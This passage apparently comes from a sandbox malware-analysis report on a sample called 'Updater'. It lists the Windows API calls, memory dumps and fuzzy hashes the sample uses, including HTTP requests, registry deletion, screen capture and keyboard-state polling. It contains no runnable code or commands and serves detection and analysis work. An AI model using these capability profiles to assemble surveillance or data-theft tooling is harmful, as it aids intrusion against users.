                                                                                                  • KillTimer.USER32(00000000,?,?,?,?,006E3F4E,00000000,?,?,006E4387,?,?), ref: 006E49AB
                                                                                                  • DestroyAcceleratorTable.USER32(00000000), ref: 007288E4
                                                                                                  • ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,006E3F4E,00000000,?,?,006E4387,?,?), ref: 00728917
                                                                                                  • ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,006E3F4E,00000000,?,?,006E4387,?,?), ref: 0072892E
                                                                                                  • ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,006E3F4E,00000000,?,?,006E4387,?,?), ref: 0072894A
                                                                                                  • DeleteObject.GDI32(00000000), ref: 0072895C
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000023.00000002.2237487910.00000000006D1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006D0000, based on PE: true
                                                                                                  • Associated: 00000023.00000002.2237462095.00000000006D0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237794040.000000000076D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237794040.0000000000791000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237853516.000000000079D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237879477.00000000007A5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_35_2_6d0000_Updater.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: Destroy$ImageList_$AcceleratorDeleteInvalidateKillObjectRectTableTimerWindow
                                                                                                  • String ID: (z
                                                                                                  • API String ID: 641708696-163357204
                                                                                                  • Opcode ID: b68209d85de2c5f506774f59bbc4462423314e08d82f467b3d0cb2b218d8e208
                                                                                                  • Instruction ID: 1a9c0b30782b9bc9b397a815e63c2c7c559acd8271d717c6111f02f7166831db
                                                                                                  • Opcode Fuzzy Hash: b68209d85de2c5f506774f59bbc4462423314e08d82f467b3d0cb2b218d8e208
                                                                                                  • Instruction Fuzzy Hash: 4661AE31502751DFCB259F2AE948B2677F2FB81316F108119E08257A61CB7DBC92DF8A
                                                                                                  APIs
                                                                                                  • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 0074CF97
                                                                                                  • GetLastError.KERNEL32(?,00000003,?,?,?,?,?,?), ref: 0074CFAA
                                                                                                  • SetEvent.KERNEL32(?,?,00000003,?,?,?,?,?,?), ref: 0074CFBE
                                                                                                  • HttpOpenRequestW.WININET(00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 0074CFD7
                                                                                                  • InternetQueryOptionW.WININET(00000000,0000001F,?,?), ref: 0074D01A
                                                                                                  • InternetSetOptionW.WININET(00000000,0000001F,00000100,00000004), ref: 0074D030
                                                                                                  • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 0074D03B
                                                                                                  • HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 0074D06B
                                                                                                  • GetLastError.KERNEL32(?,00000003,?,?,?,?,?,?), ref: 0074D0C3
                                                                                                  • SetEvent.KERNEL32(?,?,00000003,?,?,?,?,?,?), ref: 0074D0D7
                                                                                                  • InternetCloseHandle.WININET(00000000), ref: 0074D0E2
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000023.00000002.2237487910.00000000006D1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006D0000, based on PE: true
                                                                                                  • Associated: 00000023.00000002.2237462095.00000000006D0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237794040.000000000076D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237794040.0000000000791000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237853516.000000000079D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237879477.00000000007A5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_35_2_6d0000_Updater.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: Internet$Http$ErrorEventLastOptionQueryRequest$CloseConnectHandleInfoOpenSend
                                                                                                  • String ID:
                                                                                                  • API String ID: 3800310941-3916222277
                                                                                                  • Opcode ID: 9afa7578d5c8328da71c7be3e65a2f7bfdf83108feffe813b7ff4efdce5c6cbd
                                                                                                  • Instruction ID: 4daea5a3c6813eae1ca4363ecce472d27478acda856c30ce6494e93cf309e322
                                                                                                  • Opcode Fuzzy Hash: 9afa7578d5c8328da71c7be3e65a2f7bfdf83108feffe813b7ff4efdce5c6cbd
                                                                                                  • Instruction Fuzzy Hash: CC514AB1600708BFDB319F61C888ABA7BBDFF08754F00841AF98697660D778DD459BA1
                                                                                                  APIs
                                                                                                  • CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000,?,00000000,?), ref: 00768F69
                                                                                                  • GetFileSize.KERNEL32(00000000,00000000), ref: 00768F80
                                                                                                  • GlobalAlloc.KERNEL32(00000002,00000000), ref: 00768F8B
                                                                                                  • CloseHandle.KERNEL32(00000000), ref: 00768F98
                                                                                                  • GlobalLock.KERNEL32(00000000), ref: 00768FA1
                                                                                                  • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 00768FB0
                                                                                                  • GlobalUnlock.KERNEL32(00000000), ref: 00768FB9
                                                                                                  • CloseHandle.KERNEL32(00000000), ref: 00768FC0
                                                                                                  • CreateStreamOnHGlobal.OLE32(00000000,00000001,?), ref: 00768FD1
                                                                                                  • OleLoadPicture.OLEAUT32(?,00000000,00000000,00770BEC,?), ref: 00768FEA
                                                                                                  • GlobalFree.KERNEL32(00000000), ref: 00768FFA
                                                                                                  • GetObjectW.GDI32(?,00000018,000000FF), ref: 0076901E
                                                                                                  • CopyImage.USER32(?,00000000,00000000,?,00002000), ref: 0076904E
                                                                                                  • DeleteObject.GDI32(00000000), ref: 00769076
                                                                                                  • SendMessageW.USER32(?,00000172,00000000,00000000), ref: 0076908C
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000023.00000002.2237487910.00000000006D1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006D0000, based on PE: true
                                                                                                  • Associated: 00000023.00000002.2237462095.00000000006D0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237794040.000000000076D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237794040.0000000000791000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237853516.000000000079D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237879477.00000000007A5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_35_2_6d0000_Updater.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: Global$File$CloseCreateHandleObject$AllocCopyDeleteFreeImageLoadLockMessagePictureReadSendSizeStreamUnlock
                                                                                                  • String ID:
                                                                                                  • API String ID: 3840717409-0
                                                                                                  • Opcode ID: 89c060647079801dcc13cb20541b9cd2f6b46c794b5bc7a732bc6c4f5a1cf5da
                                                                                                  • Instruction ID: af9a8566da009b0bc599cb11335b5e097de1ca24a1b76861306d2d3b6a8d7351
                                                                                                  • Opcode Fuzzy Hash: 89c060647079801dcc13cb20541b9cd2f6b46c794b5bc7a732bc6c4f5a1cf5da
                                                                                                  • Instruction Fuzzy Hash: 2A412C75A00209EFDB209F65DC48EAA7BBDFF89711F108158F906E7260DB789D01DB64
                                                                                                  APIs
                                                                                                  • VariantInit.OLEAUT32(00000000), ref: 0074225D
                                                                                                  • VariantCopy.OLEAUT32(?,?), ref: 00742266
                                                                                                  • VariantClear.OLEAUT32(?), ref: 00742272
                                                                                                  • VariantTimeToSystemTime.OLEAUT32(?,?,?), ref: 00742358
                                                                                                  • VarR8FromDec.OLEAUT32(?,?), ref: 007423B4
                                                                                                  • VariantInit.OLEAUT32(?), ref: 00742465
                                                                                                  • SysFreeString.OLEAUT32(?), ref: 007424E9
                                                                                                  • VariantClear.OLEAUT32(?), ref: 00742535
                                                                                                  • VariantClear.OLEAUT32(?), ref: 00742544
                                                                                                  • VariantInit.OLEAUT32(00000000), ref: 00742582
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000023.00000002.2237487910.00000000006D1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006D0000, based on PE: true
                                                                                                  • Associated: 00000023.00000002.2237462095.00000000006D0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237794040.000000000076D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237794040.0000000000791000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237853516.000000000079D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237879477.00000000007A5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_35_2_6d0000_Updater.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: Variant$ClearInit$Time$CopyFreeFromStringSystem
                                                                                                  • String ID: %4d%02d%02d%02d%02d%02d$Default
                                                                                                  • API String ID: 1234038744-3931177956
                                                                                                  • Opcode ID: a1d7c205b5c85c3b0c419b24bf25c332917852bcfe80d72396eea4ef434af99e
                                                                                                  • Instruction ID: 09749762ed7c57302477f9cc1be87b0ed044dbdc21a5ed4909e32a2c7e30e713
                                                                                                  • Opcode Fuzzy Hash: a1d7c205b5c85c3b0c419b24bf25c332917852bcfe80d72396eea4ef434af99e
                                                                                                  • Instruction Fuzzy Hash: 79D14671A00215DBDB50DFA5C844B79B7B5FF08300F618559F805EB282DBB8ED62DBA1
                                                                                                  APIs
                                                                                                    • Part of subcall function 006DFA3B: _wcslen.LIBCMT ref: 006DFA45
                                                                                                    • Part of subcall function 0075D398: CharUpperBuffW.USER32(?,?,?,?,?,?,?,0075C0AE,?,?), ref: 0075D3B5
                                                                                                  • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0075C0F4
                                                                                                  • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 0075C172
                                                                                                  • RegDeleteValueW.ADVAPI32(?,?), ref: 0075C20A
                                                                                                  • RegCloseKey.ADVAPI32(?), ref: 0075C27E
                                                                                                  • RegCloseKey.ADVAPI32(?), ref: 0075C29C
                                                                                                  • LoadLibraryA.KERNEL32(advapi32.dll), ref: 0075C2F2
                                                                                                  • GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 0075C304
                                                                                                  • RegDeleteKeyW.ADVAPI32(?,?), ref: 0075C322
                                                                                                  • FreeLibrary.KERNEL32(00000000), ref: 0075C383
                                                                                                  • RegCloseKey.ADVAPI32(00000000), ref: 0075C394
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000023.00000002.2237487910.00000000006D1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006D0000, based on PE: true
                                                                                                  • Associated: 00000023.00000002.2237462095.00000000006D0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237794040.000000000076D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237794040.0000000000791000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237853516.000000000079D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237879477.00000000007A5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_35_2_6d0000_Updater.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: Close$DeleteLibrary$AddressBuffCharConnectFreeLoadOpenProcRegistryUpperValue_wcslen
                                                                                                  • String ID: RegDeleteKeyExW$advapi32.dll
                                                                                                  • API String ID: 2361764144-4033151799
                                                                                                  • Opcode ID: 1fed754235f92163857d09dac2dfb3468ec61f60031fa2499b6b674f0c0661a7
                                                                                                  • Instruction ID: 004d196eff5003c7046f239e0df2367cbbd076661299662e3215336aa835be7d
                                                                                                  • Opcode Fuzzy Hash: 1fed754235f92163857d09dac2dfb3468ec61f60031fa2499b6b674f0c0661a7
                                                                                                  • Instruction Fuzzy Hash: DCC17D31604341AFD721DF24C494F6ABBE1BF45304F14845DE85A8B3A2CBB9ED4ACB82
                                                                                                  APIs
                                                                                                  • GetDC.USER32(00000000), ref: 00753181
                                                                                                  • CreateCompatibleBitmap.GDI32(00000000,?,?), ref: 00753191
                                                                                                  • CreateCompatibleDC.GDI32(?), ref: 0075319D
                                                                                                  • SelectObject.GDI32(00000000,?), ref: 007531AA
                                                                                                  • StretchBlt.GDI32(?,00000000,00000000,?,?,?,00000006,?,?,?,00CC0020), ref: 00753216
                                                                                                  • GetDIBits.GDI32(?,?,00000000,00000000,00000000,00000028,00000000), ref: 00753255
                                                                                                  • GetDIBits.GDI32(?,?,00000000,?,00000000,00000028,00000000), ref: 00753279
                                                                                                  • SelectObject.GDI32(?,?), ref: 00753281
                                                                                                  • DeleteObject.GDI32(?), ref: 0075328A
                                                                                                  • DeleteDC.GDI32(?), ref: 00753291
                                                                                                  • ReleaseDC.USER32(00000000,?), ref: 0075329C
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000023.00000002.2237487910.00000000006D1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006D0000, based on PE: true
                                                                                                  • Associated: 00000023.00000002.2237462095.00000000006D0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237794040.000000000076D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237794040.0000000000791000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237853516.000000000079D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237879477.00000000007A5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_35_2_6d0000_Updater.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: Object$BitsCompatibleCreateDeleteSelect$BitmapReleaseStretch
                                                                                                  • String ID: (
                                                                                                  • API String ID: 2598888154-3887548279
                                                                                                  • Opcode ID: 8e7957ee8c216d7cceb03f008f038cadb82eaa08dbc9c6590c93fcba638c001e
                                                                                                  • Instruction ID: 052b8fbe7a49a0c63205aee3f2f18e1e31cba86c4f1e5f802d41ac808208d463
                                                                                                  • Opcode Fuzzy Hash: 8e7957ee8c216d7cceb03f008f038cadb82eaa08dbc9c6590c93fcba638c001e
                                                                                                  • Instruction Fuzzy Hash: 5661E275E00619EFCF14CFA4D884AAEBBB6FF48310F208519E956A7210E7B5AE41CF54
                                                                                                  APIs
                                                                                                  • GetClassNameW.USER32(?,?,00000100), ref: 0073473E
                                                                                                  • _wcslen.LIBCMT ref: 00734749
                                                                                                  • SendMessageTimeoutW.USER32(?,?,00000101,00000000,00000002,00001388,?), ref: 00734848
                                                                                                  • GetClassNameW.USER32(?,?,00000400), ref: 007348B9
                                                                                                  • GetDlgCtrlID.USER32(?), ref: 0073491D
                                                                                                  • GetWindowRect.USER32(?,?), ref: 00734942
                                                                                                  • GetParent.USER32(?), ref: 00734960
                                                                                                  • ScreenToClient.USER32(00000000), ref: 00734967
                                                                                                  • GetClassNameW.USER32(?,?,00000100), ref: 007349E1
                                                                                                  • GetWindowTextW.USER32(?,?,00000400), ref: 00734A1D
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000023.00000002.2237487910.00000000006D1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006D0000, based on PE: true
                                                                                                  • Associated: 00000023.00000002.2237462095.00000000006D0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237794040.000000000076D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237794040.0000000000791000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237853516.000000000079D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237879477.00000000007A5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_35_2_6d0000_Updater.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: ClassName$Window$ClientCtrlMessageParentRectScreenSendTextTimeout_wcslen
                                                                                                  • String ID: %s%u
                                                                                                  • API String ID: 4010501982-679674701
                                                                                                  • Opcode ID: d72b179b8a1c22c7b3069b3de6c3c961ce4183950c5b1a517e3cc2497bfc6239
                                                                                                  • Instruction ID: e88af128c683a97b6832b4bf77b56d0495ad721a6a2fd10fc3a4cfc3ed7cfca9
                                                                                                  • Opcode Fuzzy Hash: d72b179b8a1c22c7b3069b3de6c3c961ce4183950c5b1a517e3cc2497bfc6239
                                                                                                  • Instruction Fuzzy Hash: CBA19C712047069FE728DF64C885BABB7E9FF44344F10892DF69A82152EB38BD45CB51
                                                                                                  APIs
                                                                                                  • GetMenuItemInfoW.USER32(007A2970,000000FF,00000000,00000030), ref: 0073CE60
                                                                                                  • SetMenuItemInfoW.USER32(007A2970,00000004,00000000,00000030), ref: 0073CE95
                                                                                                  • Sleep.KERNEL32(000001F4), ref: 0073CEA7
                                                                                                  • GetMenuItemCount.USER32(?), ref: 0073CEED
                                                                                                  • GetMenuItemID.USER32(?,00000000), ref: 0073CF0A
                                                                                                  • GetMenuItemID.USER32(?,-00000001), ref: 0073CF36
                                                                                                  • GetMenuItemID.USER32(?,?), ref: 0073CF7D
                                                                                                  • CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 0073CFC3
                                                                                                  • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 0073CFD8
                                                                                                  • SetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 0073CFF9
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000023.00000002.2237487910.00000000006D1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006D0000, based on PE: true
                                                                                                  • Associated: 00000023.00000002.2237462095.00000000006D0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237794040.000000000076D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237794040.0000000000791000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237853516.000000000079D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237879477.00000000007A5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_35_2_6d0000_Updater.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: ItemMenu$Info$CheckCountRadioSleep
                                                                                                  • String ID: 0
                                                                                                  • API String ID: 1460738036-4108050209
                                                                                                  • Opcode ID: 3e825a7426693790bbdbf3781c812bf6ef6941780df1c5359b1bb0cb18397b1a
                                                                                                  • Instruction ID: 3d2181cbdc562d63c1cbf04c72fdabf4ee930dd788d6eb5c9d02b94f3bc90aaa
                                                                                                  • Opcode Fuzzy Hash: 3e825a7426693790bbdbf3781c812bf6ef6941780df1c5359b1bb0cb18397b1a
                                                                                                  • Instruction Fuzzy Hash: 2561A371A0025AAFEF22CF64DD88AFE7BB9EF05304F044059F912A3252D779AD11CB65
                                                                                                  APIs
                                                                                                  • RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?,00000000), ref: 0075D623
                                                                                                  • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?,?,?,00000000), ref: 0075D64C
                                                                                                  • FreeLibrary.KERNEL32(00000000,?,?,00000000), ref: 0075D709
                                                                                                    • Part of subcall function 0075D5F3: RegCloseKey.ADVAPI32(?,?,?,00000000), ref: 0075D669
                                                                                                    • Part of subcall function 0075D5F3: LoadLibraryA.KERNEL32(advapi32.dll,?,?,00000000), ref: 0075D67C
                                                                                                    • Part of subcall function 0075D5F3: GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 0075D68E
                                                                                                    • Part of subcall function 0075D5F3: FreeLibrary.KERNEL32(00000000,?,?,00000000), ref: 0075D6C4
                                                                                                    • Part of subcall function 0075D5F3: RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?,00000000), ref: 0075D6E7
                                                                                                  • RegDeleteKeyW.ADVAPI32(?,?), ref: 0075D6B2
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000023.00000002.2237487910.00000000006D1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006D0000, based on PE: true
                                                                                                  • Associated: 00000023.00000002.2237462095.00000000006D0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237794040.000000000076D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237794040.0000000000791000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237853516.000000000079D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237879477.00000000007A5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_35_2_6d0000_Updater.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: Library$EnumFree$AddressCloseDeleteLoadOpenProc
                                                                                                  • String ID: RegDeleteKeyExW$advapi32.dll
                                                                                                  • API String ID: 2734957052-4033151799
                                                                                                  • Opcode ID: 5f354aabb40dfb660817b9dfb92f6b2495b507dbc997544401609c3c8df75304
                                                                                                  • Instruction ID: 51f129b323a5d37fe38d662e661c5ca00cdb28a7d969d80865ed7fd9bcc8d82d
                                                                                                  • Opcode Fuzzy Hash: 5f354aabb40dfb660817b9dfb92f6b2495b507dbc997544401609c3c8df75304
                                                                                                  • Instruction Fuzzy Hash: 3A318271E01219BBDB319B91DC88EFFBB7CEF06751F004155F806E2154DAB85E4A9AA0
                                                                                                  APIs
                                                                                                  • GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 0074494E
                                                                                                  • _wcslen.LIBCMT ref: 0074497C
                                                                                                  • CreateDirectoryW.KERNEL32(?,00000000), ref: 007449AD
                                                                                                  • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000003,02200000,00000000), ref: 007449D2
                                                                                                  • DeviceIoControl.KERNEL32(00000000,000900A4,?,?,00000000,00000000,?,00000000), ref: 00744A5C
                                                                                                  • CloseHandle.KERNEL32(00000000), ref: 00744A67
                                                                                                  • RemoveDirectoryW.KERNEL32(?), ref: 00744A70
                                                                                                  • CloseHandle.KERNEL32(00000000), ref: 00744A7A
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000023.00000002.2237487910.00000000006D1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006D0000, based on PE: true
                                                                                                  • Associated: 00000023.00000002.2237462095.00000000006D0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237794040.000000000076D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237794040.0000000000791000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237853516.000000000079D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237879477.00000000007A5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_35_2_6d0000_Updater.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: CloseCreateDirectoryHandle$ControlDeviceFileFullNamePathRemove_wcslen
                                                                                                  • String ID: :$\$\??\%s
                                                                                                  • API String ID: 1149970189-3457252023
                                                                                                  • Opcode ID: c63f2e1776c936b44badea8c1fa2a47a43c5d24580d7db24e57c6a8664e706ac
                                                                                                  • Instruction ID: 429916be139d2428c276a83e82b911893338cd95225a37bc53df672d7d633dc9
                                                                                                  • Opcode Fuzzy Hash: c63f2e1776c936b44badea8c1fa2a47a43c5d24580d7db24e57c6a8664e706ac
                                                                                                  • Instruction Fuzzy Hash: 1E31C871A54209ABDB31DFA0DC49FEB37BDFF88740F1081A5F609D2150E77896449B28
                                                                                                  APIs
                                                                                                  • timeGetTime.WINMM ref: 0073F521
                                                                                                    • Part of subcall function 006EFB90: timeGetTime.WINMM(?,?,0073F540), ref: 006EFB94
                                                                                                  • Sleep.KERNEL32(0000000A), ref: 0073F54D
                                                                                                  • EnumThreadWindows.USER32(?,Function_0006F4CF,00000000), ref: 0073F571
                                                                                                  • FindWindowExW.USER32(00000000,00000000,BUTTON,00000000), ref: 0073F593
                                                                                                  • SetActiveWindow.USER32 ref: 0073F5B2
                                                                                                  • SendMessageW.USER32(00000000,000000F5,00000000,00000000), ref: 0073F5C0
                                                                                                  • SendMessageW.USER32(00000010,00000000,00000000), ref: 0073F5DF
                                                                                                  • Sleep.KERNEL32(000000FA), ref: 0073F5EA
                                                                                                  • IsWindow.USER32 ref: 0073F5F6
                                                                                                  • EndDialog.USER32(00000000), ref: 0073F607
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000023.00000002.2237487910.00000000006D1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006D0000, based on PE: true
                                                                                                  • Associated: 00000023.00000002.2237462095.00000000006D0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237794040.000000000076D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237794040.0000000000791000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237853516.000000000079D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237879477.00000000007A5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_35_2_6d0000_Updater.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: Window$MessageSendSleepTimetime$ActiveDialogEnumFindThreadWindows
                                                                                                  • String ID: BUTTON
                                                                                                  • API String ID: 1194449130-3405671355
                                                                                                  • Opcode ID: a1068008aa5a7d99932d16a14ef8cf02d67f1e53085be980a5e8a532564f5ece
                                                                                                  • Instruction ID: 6330f4cfd45405daaea2aa527d5fc4556490e49e65f102215cf9a1446c75356c
                                                                                                  • Opcode Fuzzy Hash: a1068008aa5a7d99932d16a14ef8cf02d67f1e53085be980a5e8a532564f5ece
                                                                                                  • Instruction Fuzzy Hash: 4C2180B0A14305EFF7105F35EC89A267B69AB863C4F148224F40682173DBBE8D208A69
                                                                                                  APIs
                                                                                                  • GetKeyboardState.USER32(?), ref: 0073AE4C
                                                                                                  • SetKeyboardState.USER32(?), ref: 0073AEB7
                                                                                                  • GetAsyncKeyState.USER32(000000A0), ref: 0073AED6
                                                                                                  • GetKeyState.USER32(000000A0), ref: 0073AEED
                                                                                                  • GetAsyncKeyState.USER32(000000A1), ref: 0073AF1C
                                                                                                  • GetKeyState.USER32(000000A1), ref: 0073AF2D
                                                                                                  • GetAsyncKeyState.USER32(00000011), ref: 0073AF59
                                                                                                  • GetKeyState.USER32(00000011), ref: 0073AF67
                                                                                                  • GetAsyncKeyState.USER32(00000012), ref: 0073AF90
                                                                                                  • GetKeyState.USER32(00000012), ref: 0073AF9E
                                                                                                  • GetAsyncKeyState.USER32(0000005B), ref: 0073AFC7
                                                                                                  • GetKeyState.USER32(0000005B), ref: 0073AFD5
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000023.00000002.2237487910.00000000006D1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006D0000, based on PE: true
                                                                                                  • Associated: 00000023.00000002.2237462095.00000000006D0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237794040.000000000076D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237794040.0000000000791000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237853516.000000000079D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237879477.00000000007A5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_35_2_6d0000_Updater.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: State$Async$Keyboard
                                                                                                  • String ID:
